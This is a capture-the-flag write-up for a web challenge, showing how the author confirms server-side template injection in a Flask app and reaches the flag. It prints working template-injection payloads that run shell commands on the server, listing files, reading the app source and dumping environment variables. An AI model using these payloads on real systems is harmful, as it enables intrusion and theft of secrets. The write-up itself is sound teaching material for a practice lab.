AUCHALL - [Web] - Temp

You,AUCHALLWeb
Back

Challenge Description

I'm temporarily storing files for you...

Solution

On opening the challenge we were given the portfolio website

There is nothing which is interesting until you check for different paths in website /login /check

Let suppose we go for /check

Alt text

we see that our endpoint name is reflected on page which gives me hint for xss but wait we would get anything from that until any bot is involved so I skipped xss then I check for server side template injection

http://SERVER-IP:PORT/{{7*7}}

Alt text

I got 49 which confirms that there is SSTI

Then I used ssti payload to run shell commands

http://SERVER-IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }}

App Source Code

http://SERVER-IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /app/app.py').read() }}

Alt text

app.config["FLAG"] = "You're at the right path, but no. The flag is not here." This tells that I have to fuzz the container

Then I checked for env

Flag is in env

http://SERVER-IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('env').read() }}

Alt text

Flag

Flag is dynamic

CY243L{sst1s_1n_fl4sk_ar3_ez_pz_CAa3Ee9_ZcdU_XPJ3}

Writeups 2023 © RootxRAN.